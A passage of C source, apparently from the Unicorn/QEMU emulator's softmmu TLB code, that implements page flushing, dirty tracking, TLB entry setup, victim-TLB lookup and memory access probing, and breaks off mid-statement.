tlb_entry, page)) { memset(tlb_entry, -1, sizeof(*tlb_entry)); return true; } return false; } /* Called with tlb_c.lock held */ static inline void tlb_flush_vtlb_page_locked(CPUArchState *env, int mmu_idx, target_ulong page) { CPUTLBDesc *d = &env_tlb(env)->d[mmu_idx]; int k; // assert_cpu_is_self(env_cpu(env)); for (k = 0; k < CPU_VTLB_SIZE; k++) { if (tlb_flush_entry_locked(env->uc, &d->vtable[k], page)) { tlb_n_used_entries_dec(env, mmu_idx); } } } static void tlb_flush_page_locked(CPUArchState *env, int midx, target_ulong page) { target_ulong lp_addr = env_tlb(env)->d[midx].large_page_addr; target_ulong lp_mask = env_tlb(env)->d[midx].large_page_mask; /* Check if we need to flush due to large pages. 
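 *
 * Worked example (illustrative): once tlb_add_large_page() has recorded
 * a 2 MiB page at 0x00200000 (lp_mask == ~(target_ulong)0x1fffff),
 * flushing any page in [0x00200000, 0x003fffff] matches the test below
 * and forces a full flush of this mmu_idx, since the small entries
 * covered by the large page cannot be enumerated in the direct-mapped
 * table.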
*/ if ((page & lp_mask) == lp_addr) { tlb_flush_one_mmuidx_locked(env, midx, get_clock_realtime()); } else { if (tlb_flush_entry_locked(env->uc, tlb_entry(env, midx, page), page)) { tlb_n_used_entries_dec(env, midx); } tlb_flush_vtlb_page_locked(env, midx, page); } } /** * tlb_flush_page_by_mmuidx_async_0: * @cpu: cpu on which to flush * @addr: page of virtual address to flush * @idxmap: set of mmu_idx to flush * * Helper for tlb_flush_page_by_mmuidx and friends, flush one page * at @addr from the tlbs indicated by @idxmap from @cpu. */ static void tlb_flush_page_by_mmuidx_async_0(CPUState *cpu, target_ulong addr, uint16_t idxmap) { CPUArchState *env = cpu->env_ptr; int mmu_idx; for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { if ((idxmap >> mmu_idx) & 1) { tlb_flush_page_locked(env, mmu_idx, addr); } } tb_flush_jmp_cache(cpu, addr); } /** * tlb_flush_page_by_mmuidx_async_1: * @cpu: cpu on which to flush * @data: encoded addr + idxmap * * Helper for tlb_flush_page_by_mmuidx and friends, called through * async_run_on_cpu. The idxmap parameter is encoded in the page * offset of the target_ptr field. This limits the set of mmu_idx * that can be passed via this method. */ static void tlb_flush_page_by_mmuidx_async_1(CPUState *cpu, run_on_cpu_data data) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif target_ulong addr_and_idxmap = (target_ulong) data.target_ptr; target_ulong addr = addr_and_idxmap & TARGET_PAGE_MASK; uint16_t idxmap = addr_and_idxmap & ~TARGET_PAGE_MASK; tlb_flush_page_by_mmuidx_async_0(cpu, addr, idxmap); } typedef struct { target_ulong addr; uint16_t idxmap; } TLBFlushPageByMMUIdxData; /** * tlb_flush_page_by_mmuidx_async_2: * @cpu: cpu on which to flush * @data: allocated addr + idxmap * * Helper for tlb_flush_page_by_mmuidx and friends, called through * async_run_on_cpu. The addr+idxmap parameters are stored in a * TLBFlushPageByMMUIdxData structure that has been allocated * specifically for this helper. Free the structure when done. */ static void tlb_flush_page_by_mmuidx_async_2(CPUState *cpu, run_on_cpu_data data) { TLBFlushPageByMMUIdxData *d = data.host_ptr; tlb_flush_page_by_mmuidx_async_0(cpu, d->addr, d->idxmap); g_free(d); } void tlb_flush_page_by_mmuidx(CPUState *cpu, target_ulong addr, uint16_t idxmap) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif /* This should already be page aligned */ addr &= TARGET_PAGE_MASK; // if (qemu_cpu_is_self(cpu)) { tlb_flush_page_by_mmuidx_async_0(cpu, addr, idxmap); //} #if 0 else if (idxmap < TARGET_PAGE_SIZE) { /* * Most targets have only a few mmu_idx. In the case where * we can stuff idxmap into the low TARGET_PAGE_BITS, avoid * allocating memory for this operation. */ tlb_flush_page_by_mmuidx_async_1(cpu, RUN_ON_CPU_TARGET_PTR(addr | idxmap)); } else { TLBFlushPageByMMUIdxData *d = g_new(TLBFlushPageByMMUIdxData, 1); /* Otherwise allocate a structure, freed by the worker. */ d->addr = addr; d->idxmap = idxmap; tlb_flush_page_by_mmuidx_async_2(cpu, RUN_ON_CPU_HOST_PTR(d)); } #endif } void tlb_flush_page(CPUState *cpu, target_ulong addr) { tlb_flush_page_by_mmuidx(cpu, addr, ALL_MMUIDX_BITS); } void tlb_flush_page_by_mmuidx_all_cpus(CPUState *src_cpu, target_ulong addr, uint16_t idxmap) { #ifdef TARGET_ARM struct uc_struct *uc = src_cpu->uc; #endif /* This should already be page aligned */ addr &= TARGET_PAGE_MASK; /* * Allocate memory to hold addr+idxmap only when needed. * See tlb_flush_page_by_mmuidx for details. 
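 *
 * (The packed encoding works because addr is page aligned: with 4 KiB
 * pages an idxmap < TARGET_PAGE_SIZE fits entirely in the low 12 bits
 * of addr | idxmap, and tlb_flush_page_by_mmuidx_async_1() recovers it
 * with addr & ~TARGET_PAGE_MASK.)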
*/ if (idxmap < TARGET_PAGE_SIZE) { flush_all_helper(src_cpu, tlb_flush_page_by_mmuidx_async_1, RUN_ON_CPU_TARGET_PTR(addr | idxmap)); } else { #if 0 CPUState *dst_cpu; /* Allocate a separate data block for each destination cpu. */ CPU_FOREACH(dst_cpu) { if (dst_cpu != src_cpu) { TLBFlushPageByMMUIdxData *d = g_new(TLBFlushPageByMMUIdxData, 1); d->addr = addr; d->idxmap = idxmap; tlb_flush_page_by_mmuidx_async_2(dst_cpu, RUN_ON_CPU_HOST_PTR(d)); } } #endif } tlb_flush_page_by_mmuidx_async_0(src_cpu, addr, idxmap); } void tlb_flush_page_all_cpus(CPUState *src, target_ulong addr) { tlb_flush_page_by_mmuidx_all_cpus(src, addr, ALL_MMUIDX_BITS); } void tlb_flush_page_by_mmuidx_all_cpus_synced(CPUState *src_cpu, target_ulong addr, uint16_t idxmap) { #ifdef TARGET_ARM struct uc_struct *uc = src_cpu->uc; #endif /* This should already be page aligned */ addr &= TARGET_PAGE_MASK; /* * Allocate memory to hold addr+idxmap only when needed. * See tlb_flush_page_by_mmuidx for details. */ if (idxmap < TARGET_PAGE_SIZE) { flush_all_helper(src_cpu, tlb_flush_page_by_mmuidx_async_1, RUN_ON_CPU_TARGET_PTR(addr | idxmap)); tlb_flush_page_by_mmuidx_async_1(src_cpu, RUN_ON_CPU_TARGET_PTR(addr | idxmap)); } else { //CPUState *dst_cpu; TLBFlushPageByMMUIdxData *d; #if 0 /* Allocate a separate data block for each destination cpu. */ CPU_FOREACH(dst_cpu) { if (dst_cpu != src_cpu) { d = g_new(TLBFlushPageByMMUIdxData, 1); d->addr = addr; d->idxmap = idxmap; tlb_flush_page_by_mmuidx_async_2(dst_cpu, RUN_ON_CPU_HOST_PTR(d)); } } #endif d = g_new(TLBFlushPageByMMUIdxData, 1); d->addr = addr; d->idxmap = idxmap; tlb_flush_page_by_mmuidx_async_2(src_cpu, RUN_ON_CPU_HOST_PTR(d)); } } void tlb_flush_page_all_cpus_synced(CPUState *src, target_ulong addr) { tlb_flush_page_by_mmuidx_all_cpus_synced(src, addr, ALL_MMUIDX_BITS); } /* update the TLBs so that writes to code in the virtual page 'addr' can be detected */ void tlb_protect_code(struct uc_struct *uc, ram_addr_t ram_addr) { cpu_physical_memory_test_and_clear_dirty(ram_addr, TARGET_PAGE_SIZE, DIRTY_MEMORY_CODE); } /* update the TLB so that writes in physical page 'phys_addr' are no longer tested for self modifying code */ void tlb_unprotect_code(struct uc_struct *uc, ram_addr_t ram_addr) { cpu_physical_memory_set_dirty_flag(ram_addr, DIRTY_MEMORY_CODE); } /* * Dirty write flag handling * * When the TCG code writes to a location it looks up the address in * the TLB and uses that data to compute the final address. If any of * the lower bits of the address are set then the slow path is forced. * There are a number of reasons to do this but for normal RAM the * most usual is detecting writes to code regions which may invalidate * generated code. * * Other vCPUs might be reading their TLBs during guest execution, so we update * te->addr_write with atomic_set. We don't need to worry about this for * oversized guests as MTTCG is disabled for them. * * Called with tlb_c.lock held. 
*/ static void tlb_reset_dirty_range_locked(struct uc_struct *uc, CPUTLBEntry *tlb_entry, uintptr_t start, uintptr_t length) { uintptr_t addr = tlb_entry->addr_write; if ((addr & (TLB_INVALID_MASK | TLB_MMIO | TLB_DISCARD_WRITE | TLB_NOTDIRTY)) == 0) { addr &= TARGET_PAGE_MASK; addr += tlb_entry->addend; if ((addr - start) < length) { #if TCG_OVERSIZED_GUEST tlb_entry->addr_write |= TLB_NOTDIRTY; #else tlb_entry->addr_write = tlb_entry->addr_write | TLB_NOTDIRTY; #endif } } } static void tlb_reset_dirty_range_by_vaddr_locked(struct uc_struct *uc, CPUTLBEntry *tlb_entry, target_ulong start, target_ulong length) { uintptr_t addr = tlb_entry->addr_write; if ((addr & (TLB_INVALID_MASK | TLB_MMIO | TLB_DISCARD_WRITE | TLB_NOTDIRTY)) == 0) { addr &= TARGET_PAGE_MASK; if ((addr - start) < length) { #if TCG_OVERSIZED_GUEST tlb_entry->addr_write |= TLB_NOTDIRTY; #else tlb_entry->addr_write = tlb_entry->addr_write | TLB_NOTDIRTY; #endif } } } /* * Called with tlb_c.lock held. * Called only from the vCPU context, i.e. the TLB's owner thread. */ static inline void copy_tlb_helper_locked(CPUTLBEntry *d, const CPUTLBEntry *s) { *d = *s; } /* This is a cross vCPU call (i.e. another vCPU resetting the flags of * the target vCPU). * We must take tlb_c.lock to avoid racing with another vCPU update. The only * thing actually updated is the target TLB entry ->addr_write flags. */ void tlb_reset_dirty(CPUState *cpu, ram_addr_t start1, ram_addr_t length) { struct uc_struct *uc = cpu->uc; CPUArchState *env; int mmu_idx; env = cpu->env_ptr; for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { unsigned int i; unsigned int n = tlb_n_entries(&env_tlb(env)->f[mmu_idx]); for (i = 0; i < n; i++) { tlb_reset_dirty_range_locked(uc, &env_tlb(env)->f[mmu_idx].table[i], start1, length); } for (i = 0; i < CPU_VTLB_SIZE; i++) { tlb_reset_dirty_range_locked(uc, &env_tlb(env)->d[mmu_idx].vtable[i], start1, length); } } } void tlb_reset_dirty_by_vaddr(CPUState *cpu, target_ulong start1, target_ulong length) { struct uc_struct *uc = cpu->uc; CPUArchState *env; int mmu_idx; env = cpu->env_ptr; for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { unsigned int i; unsigned int n = tlb_n_entries(&env_tlb(env)->f[mmu_idx]); for (i = 0; i < n; i++) { tlb_reset_dirty_range_by_vaddr_locked(uc, &env_tlb(env)->f[mmu_idx].table[i], start1, length); } for (i = 0; i < CPU_VTLB_SIZE; i++) { tlb_reset_dirty_range_by_vaddr_locked(uc, &env_tlb(env)->d[mmu_idx].vtable[i], start1, length); } } } /* Called with tlb_c.lock held */ static inline void tlb_set_dirty1_locked(CPUTLBEntry *tlb_entry, target_ulong vaddr) { if (tlb_entry->addr_write == (vaddr | TLB_NOTDIRTY)) { tlb_entry->addr_write = vaddr; } } /* update the TLB corresponding to virtual page vaddr so that it is no longer dirty */ void tlb_set_dirty(CPUState *cpu, target_ulong vaddr) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif CPUArchState *env = cpu->env_ptr; int mmu_idx; // assert_cpu_is_self(cpu); vaddr &= TARGET_PAGE_MASK; for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { tlb_set_dirty1_locked(tlb_entry(env, mmu_idx, vaddr), vaddr); } for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { int k; for (k = 0; k < CPU_VTLB_SIZE; k++) { tlb_set_dirty1_locked(&env_tlb(env)->d[mmu_idx].vtable[k], vaddr); } } } /* Our TLB does not support large pages, so remember the area covered by large pages and trigger a full TLB flush if these are invalidated. 
*/ static void tlb_add_large_page(CPUArchState *env, int mmu_idx, target_ulong vaddr, target_ulong size) { target_ulong lp_addr = env_tlb(env)->d[mmu_idx].large_page_addr; target_ulong lp_mask = ~(size - 1); if (lp_addr == (target_ulong)-1) { /* No previous large page. */ lp_addr = vaddr; } else { /* Extend the existing region to include the new page. This is a compromise between unnecessary flushes and the cost of maintaining a full variable size TLB. */ lp_mask &= env_tlb(env)->d[mmu_idx].large_page_mask; while (((lp_addr ^ vaddr) & lp_mask) != 0) { lp_mask <<= 1; } } env_tlb(env)->d[mmu_idx].large_page_addr = lp_addr & lp_mask; env_tlb(env)->d[mmu_idx].large_page_mask = lp_mask; } /* Add a new TLB entry. At most one entry for a given virtual address * is permitted. Only a single TARGET_PAGE_SIZE region is mapped, the * supplied size is only used by tlb_flush_page. * * Called from TCG-generated code, which is under an RCU read-side * critical section. */ void tlb_set_page_with_attrs(CPUState *cpu, target_ulong vaddr, hwaddr paddr, MemTxAttrs attrs, int prot, int mmu_idx, target_ulong size) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif CPUArchState *env = cpu->env_ptr; CPUTLB *tlb = env_tlb(env); CPUTLBDesc *desc = &tlb->d[mmu_idx]; MemoryRegionSection *section; unsigned int index; target_ulong address; target_ulong write_address; uintptr_t addend; CPUTLBEntry *te, tn; hwaddr iotlb, xlat, sz, paddr_page; target_ulong vaddr_page; int asidx = cpu_asidx_from_attrs(cpu, attrs); int wp_flags; bool is_ram; // assert_cpu_is_self(cpu); if (size <= TARGET_PAGE_SIZE) { sz = TARGET_PAGE_SIZE; } else { tlb_add_large_page(env, mmu_idx, vaddr, size); sz = size; } vaddr_page = vaddr & TARGET_PAGE_MASK; paddr_page = paddr & TARGET_PAGE_MASK; section = address_space_translate_for_iotlb(cpu, asidx, paddr_page, &xlat, &sz, attrs, &prot); assert(sz >= TARGET_PAGE_SIZE); address = vaddr_page; if (size < TARGET_PAGE_SIZE) { /* Repeat the MMU check and TLB fill on every access. */ address |= TLB_INVALID_MASK; } if (attrs.byte_swap) { address |= TLB_BSWAP; } is_ram = memory_region_is_ram(section->mr); // is_romd = memory_region_is_romd(section->mr); if (is_ram) { /* RAM and ROMD both have associated host memory. */ addend = (uintptr_t)memory_region_get_ram_ptr(section->mr) + xlat; } else { /* I/O does not; force the host address to NULL. */ addend = 0; } write_address = address; if (is_ram) { iotlb = memory_region_get_ram_addr(section->mr) + xlat; /* * Computing is_clean is expensive; avoid all that unless * the page is actually writable. */ if (prot & PAGE_WRITE) { if (section->readonly) { write_address |= TLB_DISCARD_WRITE; } else if (cpu_physical_memory_is_clean(iotlb)) { write_address |= TLB_NOTDIRTY; } } } else { /* I/O or ROMD */ iotlb = memory_region_section_get_iotlb(cpu, section) + xlat; /* * Writes to romd devices must go through MMIO to enable write. * Reads to romd devices go through the ram_ptr found above, * but of course reads to I/O must go through MMIO. */ write_address |= TLB_MMIO; //if (!is_romd) { address = write_address; //} } wp_flags = cpu_watchpoint_address_matches(cpu, vaddr_page, TARGET_PAGE_SIZE); index = tlb_index(env, mmu_idx, vaddr_page); te = tlb_entry(env, mmu_idx, vaddr_page); /* Note that the tlb is no longer clean. */ tlb->c.dirty |= 1 << mmu_idx; /* Make sure there's no cached translation for the new page. 
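 * (A stale translation for vaddr_page left in the victim cache would
 * otherwise be swapped back in by victim_tlb_hit() on a later miss,
 * shadowing the entry installed below.)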
*/ tlb_flush_vtlb_page_locked(env, mmu_idx, vaddr_page); /* * Only evict the old entry to the victim tlb if it's for a * different page; otherwise just overwrite the stale data. */ if (!tlb_hit_page_anyprot(env->uc, te, vaddr_page) && !tlb_entry_is_empty(te)) { unsigned vidx = desc->vindex++ % CPU_VTLB_SIZE; CPUTLBEntry *tv = &desc->vtable[vidx]; /* Evict the old entry into the victim tlb. */ copy_tlb_helper_locked(tv, te); desc->viotlb[vidx] = desc->iotlb[index]; tlb_n_used_entries_dec(env, mmu_idx); } /* refill the tlb */ /* * At this point iotlb contains a physical section number in the lower * TARGET_PAGE_BITS, and either * + the ram_addr_t of the page base of the target RAM (RAM) * + the offset within section->mr of the page base (I/O, ROMD) * We subtract the vaddr_page (which is page aligned and thus won't * disturb the low bits) to give an offset which can be added to the * (non-page-aligned) vaddr of the eventual memory access to get * the MemoryRegion offset for the access. Note that the vaddr we * subtract here is that of the page base, and not the same as the * vaddr we add back in io_readx()/io_writex()/get_page_addr_code(). */ desc->iotlb[index].addr = iotlb - vaddr_page; desc->iotlb[index].attrs = attrs; /* Now calculate the new entry */ tn.addend = addend - vaddr_page; tn.paddr = paddr_page; if (prot & PAGE_READ) { tn.addr_read = address; if (wp_flags & BP_MEM_READ) { tn.addr_read |= TLB_WATCHPOINT; } } else { tn.addr_read = -1; } if (prot & PAGE_EXEC) { tn.addr_code = address; } else { tn.addr_code = -1; } tn.addr_write = -1; if (prot & PAGE_WRITE) { tn.addr_write = write_address; if (prot & PAGE_WRITE_INV) { tn.addr_write |= TLB_INVALID_MASK; } if (wp_flags & BP_MEM_WRITE) { tn.addr_write |= TLB_WATCHPOINT; } } copy_tlb_helper_locked(te, &tn); tlb_n_used_entries_inc(env, mmu_idx); } /* Add a new TLB entry, but without specifying the memory * transaction attributes to be used. */ void tlb_set_page(CPUState *cpu, target_ulong vaddr, hwaddr paddr, int prot, int mmu_idx, target_ulong size) { tlb_set_page_with_attrs(cpu, vaddr, paddr, MEMTXATTRS_UNSPECIFIED, prot, mmu_idx, size); } static inline ram_addr_t qemu_ram_addr_from_host_nofail(struct uc_struct *uc, void *ptr) { ram_addr_t ram_addr; ram_addr = qemu_ram_addr_from_host(uc, ptr); if (ram_addr == RAM_ADDR_INVALID) { // error_report("Bad ram pointer %p", ptr); abort(); } return ram_addr; } /* * Note: tlb_fill() can trigger a resize of the TLB. This means that all of the * caller's prior references to the TLB table (e.g. CPUTLBEntry pointers) must * be discarded and looked up again (e.g. via tlb_entry()). */ static void tlb_fill(CPUState *cpu, target_ulong addr, int size, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { CPUClass *cc = CPU_GET_CLASS(cpu); #ifndef NDEBUG bool ok; /* * This is not a probe, so only valid return is success; failure * should result in exception + longjmp to the cpu loop. 
*/ ok = cc->tlb_fill(cpu, addr, size, access_type, mmu_idx, false, retaddr); assert(ok); #else cc->tlb_fill(cpu, addr, size, access_type, mmu_idx, false, retaddr); #endif } static uint64_t io_readx(CPUArchState *env, CPUIOTLBEntry *iotlbentry, int mmu_idx, target_ulong addr, uintptr_t retaddr, MMUAccessType access_type, MemOp op) { CPUState *cpu = env_cpu(env); struct uc_struct *uc = cpu->uc; hwaddr mr_offset; MemoryRegionSection *section; MemoryRegion *mr; uint64_t val; MemTxResult r; section = iotlb_to_section(cpu, iotlbentry->addr, iotlbentry->attrs); mr = section->mr; mr_offset = (iotlbentry->addr & TARGET_PAGE_MASK) + addr; cpu->mem_io_pc = retaddr; if (!cpu->can_do_io) { cpu_io_recompile(cpu, retaddr); } r = memory_region_dispatch_read(uc, mr, mr_offset, &val, op, iotlbentry->attrs); if (r != MEMTX_OK) { #if 0 hwaddr physaddr = mr_offset + section->offset_within_address_space - section->offset_within_region; cpu_transaction_failed(cpu, physaddr, addr, memop_size(op), access_type, mmu_idx, iotlbentry->attrs, r, retaddr); #endif } return val; } static void io_writex(CPUArchState *env, CPUIOTLBEntry *iotlbentry, int mmu_idx, uint64_t val, target_ulong addr, uintptr_t retaddr, MemOp op) { CPUState *cpu = env_cpu(env); struct uc_struct *uc = env->uc; hwaddr mr_offset; MemoryRegionSection *section; MemoryRegion *mr; MemTxResult r; section = iotlb_to_section(cpu, iotlbentry->addr, iotlbentry->attrs); mr = section->mr; mr_offset = (iotlbentry->addr & TARGET_PAGE_MASK) + addr; if (!cpu->can_do_io) { cpu_io_recompile(cpu, retaddr); } cpu->mem_io_pc = retaddr; r = memory_region_dispatch_write(uc, mr, mr_offset, val, op, iotlbentry->attrs); if (r != MEMTX_OK) { #if 0 hwaddr physaddr = mr_offset + section->offset_within_address_space - section->offset_within_region; cpu_transaction_failed(cpu, physaddr, addr, memop_size(op), MMU_DATA_STORE, mmu_idx, iotlbentry->attrs, r, retaddr); #endif } } static inline target_ulong tlb_read_ofs(CPUTLBEntry *entry, size_t ofs) { #if TCG_OVERSIZED_GUEST return *(target_ulong *)((uintptr_t)entry + ofs); #else return *(target_ulong *)((uintptr_t)entry + ofs); #endif } /* Return true if ADDR is present in the victim tlb, and has been copied back to the main tlb. */ static bool victim_tlb_hit(CPUArchState *env, size_t mmu_idx, size_t index, size_t elt_ofs, target_ulong page) { size_t vidx; // assert_cpu_is_self(env_cpu(env)); for (vidx = 0; vidx < CPU_VTLB_SIZE; ++vidx) { CPUTLBEntry *vtlb = &env_tlb(env)->d[mmu_idx].vtable[vidx]; target_ulong cmp; #if TCG_OVERSIZED_GUEST cmp = *(target_ulong *)((uintptr_t)vtlb + elt_ofs); #else cmp = *(target_ulong *)((uintptr_t)vtlb + elt_ofs); #endif if (cmp == page) { /* Found entry in victim tlb, swap tlb and iotlb. */ CPUTLBEntry tmptlb, *tlb = &env_tlb(env)->f[mmu_idx].table[index]; copy_tlb_helper_locked(&tmptlb, tlb); copy_tlb_helper_locked(tlb, vtlb); copy_tlb_helper_locked(vtlb, &tmptlb); CPUIOTLBEntry tmpio, *io = &env_tlb(env)->d[mmu_idx].iotlb[index]; CPUIOTLBEntry *vio = &env_tlb(env)->d[mmu_idx].viotlb[vidx]; tmpio = *io; *io = *vio; *vio = tmpio; return true; } } return false; } /* Macro to call the above, with local variables from the use context. */ #define VICTIM_TLB_HIT(TY, ADDR) \ victim_tlb_hit(env, mmu_idx, index, offsetof(CPUTLBEntry, TY), \ (ADDR) & TARGET_PAGE_MASK) /* * Return a ram_addr_t for the virtual address for execution. * * Return -1 if we can't translate and execute from an entire page * of RAM. This will force us to execute by loading and translating * one insn at a time, without caching. 
* * NOTE: This function will trigger an exception if the page is * not executable. */ tb_page_addr_t get_page_addr_code_hostp(CPUArchState *env, target_ulong addr, void **hostp) { struct uc_struct *uc = env->uc; uintptr_t mmu_idx = cpu_mmu_index(env, true); uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); void *p; if (unlikely(!tlb_hit(uc, entry->addr_code, addr))) { if (!VICTIM_TLB_HIT(addr_code, addr)) { tlb_fill(env_cpu(env), addr, 0, MMU_INST_FETCH, mmu_idx, 0); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); if (unlikely(entry->addr_code & TLB_INVALID_MASK)) { /* * The MMU protection covers a smaller range than a target * page, so we must redo the MMU check for every insn. */ return -1; } } assert(tlb_hit(uc, entry->addr_code, addr)); } if (unlikely(entry->addr_code & TLB_MMIO)) { /* The region is not backed by RAM. */ if (hostp) { *hostp = NULL; } return -1; } p = (void *)((uintptr_t)addr + entry->addend); if (hostp) { *hostp = p; } return qemu_ram_addr_from_host_nofail(env->uc, p); } tb_page_addr_t get_page_addr_code(CPUArchState *env, target_ulong addr) { return get_page_addr_code_hostp(env, addr, NULL); } static void notdirty_write(CPUState *cpu, vaddr mem_vaddr, unsigned size, CPUIOTLBEntry *iotlbentry, uintptr_t retaddr, MemoryRegion *mr) { ram_addr_t ram_addr = mem_vaddr + iotlbentry->addr; if (mr == NULL) { mr = cpu->uc->memory_mapping(cpu->uc, mem_vaddr); } if ((mr->perms & UC_PROT_EXEC) != 0) { struct page_collection *pages = page_collection_lock(cpu->uc, ram_addr, ram_addr + size); tb_invalidate_phys_page_fast(cpu->uc, pages, ram_addr, size, retaddr); page_collection_unlock(pages); } /* For exec pages, this is cleared in tb_gen_code. */ // If we: // - have memory hooks installed // - or doing snapshot // , then never clean the tlb if (!(cpu->uc->snapshot_level > 0 || mr->priority > 0) && !(HOOK_EXISTS(cpu->uc, UC_HOOK_MEM_READ) || HOOK_EXISTS(cpu->uc, UC_HOOK_MEM_WRITE))) { tlb_set_dirty(cpu, mem_vaddr); } } /* * Probe for whether the specified guest access is permitted. If it is not * permitted then an exception will be taken in the same way as if this * were a real access (and we will not return). * If the size is 0 or the page requires I/O access, returns NULL; otherwise, * returns the address of the host page similar to tlb_vaddr_to_host(). */ void *probe_access(CPUArchState *env, target_ulong addr, int size, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { #ifdef TARGET_ARM struct uc_struct *uc = env->uc; #endif uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr; size_t elt_ofs = 0; int wp_access = 0; #ifdef _MSC_VER g_assert(((target_ulong)0 - (addr | TARGET_PAGE_MASK)) >= size); #else g_assert(-(addr | TARGET_PAGE_MASK) >= size); #endif switch (access_type) { case MMU_DATA_LOAD: elt_ofs = offsetof(CPUTLBEntry, addr_read); wp_access = BP_MEM_READ; break; case MMU_DATA_STORE: elt_ofs = offsetof(CPUTLBEntry, addr_write); wp_access = BP_MEM_WRITE; break; case MMU_INST_FETCH: elt_ofs = offsetof(CPUTLBEntry, addr_code); wp_access = BP_MEM_READ; break; default: g_assert_not_reached(); } tlb_addr = tlb_read_ofs(entry, elt_ofs); if (unlikely(!tlb_hit(env->uc, tlb_addr, addr))) { if (!victim_tlb_hit(env, mmu_idx, index, elt_ofs, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, access_type, mmu_idx, retaddr); /* TLB resize via tlb_fill may have moved the entry. 
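     * (tlb_fill() can trigger tlb_mmu_resize_locked(), which reallocates
     * fast->table; a CPUTLBEntry pointer taken before the fill, such as
     * "entry" here, may then dangle, hence the fresh lookup below.)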
*/ index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_read_ofs(entry, elt_ofs); } if (!size) { return NULL; } if (unlikely(tlb_addr & TLB_FLAGS_MASK)) { CPUIOTLBEntry *iotlbentry = &env_tlb(env)->d[mmu_idx].iotlb[index]; /* Reject I/O access, or other required slow-path. */ if (tlb_addr & (TLB_MMIO | TLB_BSWAP | TLB_DISCARD_WRITE)) { return NULL; } /* Handle watchpoints. */ if (tlb_addr & TLB_WATCHPOINT) { cpu_check_watchpoint(env_cpu(env), addr, size, iotlbentry->attrs, wp_access, retaddr); } /* Handle clean RAM pages. */ if (tlb_addr & TLB_NOTDIRTY) { notdirty_write(env_cpu(env), addr, size, iotlbentry, retaddr, NULL); } } return (void *)((uintptr_t)addr + entry->addend); } void *tlb_vaddr_to_host(CPUArchState *env, abi_ptr addr, MMUAccessType access_type, int mmu_idx) { struct uc_struct *uc = env->uc; CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr, page; size_t elt_ofs = 0; switch (access_type) { case MMU_DATA_LOAD: elt_ofs = offsetof(CPUTLBEntry, addr_read); break; case MMU_DATA_STORE: elt_ofs = offsetof(CPUTLBEntry, addr_write); break; case MMU_INST_FETCH: elt_ofs = offsetof(CPUTLBEntry, addr_code); break; default: g_assert_not_reached(); } page = addr & TARGET_PAGE_MASK; tlb_addr = tlb_read_ofs(entry, elt_ofs); if (!tlb_hit_page(uc, tlb_addr, page)) { uintptr_t index = tlb_index(env, mmu_idx, addr); if (!victim_tlb_hit(env, mmu_idx, index, elt_ofs, page)) { CPUState *cs = env_cpu(env); CPUClass *cc = CPU_GET_CLASS(cs); if (!cc->tlb_fill(cs, addr, 0, access_type, mmu_idx, true, 0)) { /* Non-faulting page table read failed. */ return NULL; } /* TLB resize via tlb_fill may have moved the entry. */ entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_read_ofs(entry, elt_ofs); } if (tlb_addr & ~TARGET_PAGE_MASK) { /* IO access */ return NULL; } return (void *)((uintptr_t)addr + entry->addend); } /* Probe for a read-modify-write atomic operation. Do not allow unaligned * operations, or io operations to proceed. Return the host address. */ static void *atomic_mmu_lookup(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { #ifdef TARGET_ARM struct uc_struct *uc = env->uc; #endif size_t mmu_idx = get_mmuidx(oi); uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *tlbe = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr = tlb_addr_write(tlbe); MemOp mop = get_memop(oi); int a_bits = get_alignment_bits(mop); int s_bits = mop & MO_SIZE; void *hostaddr; /* Adjust the given return address. */ retaddr -= GETPC_ADJ; /* Enforce guest required alignment. */ if (unlikely(a_bits > 0 && (addr & ((1 << a_bits) - 1)))) { /* ??? Maybe indicate atomic op to cpu_unaligned_access */ cpu_unaligned_access(env_cpu(env), addr, MMU_DATA_STORE, mmu_idx, retaddr); } /* Enforce qemu required alignment. */ if (unlikely(addr & ((1 << s_bits) - 1))) { /* We get here if guest alignment was not requested, or was not enforced by cpu_unaligned_access above. We might widen the access and emulate, but for now mark an exception and exit the cpu loop. */ goto stop_the_world; } /* Check TLB entry and enforce page permissions. 
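     * (An atomic read-modify-write needs the page both writable and
     * readable: the write entry is checked first, then addr_read is
     * verified further below before the host address is returned.)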
*/ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!VICTIM_TLB_HIT(addr_write, addr)) { tlb_fill(env_cpu(env), addr, 1 << s_bits, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); tlbe = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_addr_write(tlbe) & ~TLB_INVALID_MASK; } /* Notice an IO access or a needs-MMU-lookup access */ if (unlikely(tlb_addr & TLB_MMIO)) { /* There's really nothing that can be done to support this apart from stop-the-world. */ goto stop_the_world; } /* Let the guest notice RMW on a write-only page. */ if (unlikely(tlbe->addr_read != (tlb_addr & ~TLB_NOTDIRTY))) { tlb_fill(env_cpu(env), addr, 1 << s_bits, MMU_DATA_LOAD, mmu_idx, retaddr); /* Since we don't support reads and writes to different addresses, and we do have the proper page loaded for write, this shouldn't ever return. But just in case, handle via stop-the-world. */ goto stop_the_world; } hostaddr = (void *)((uintptr_t)addr + tlbe->addend); if 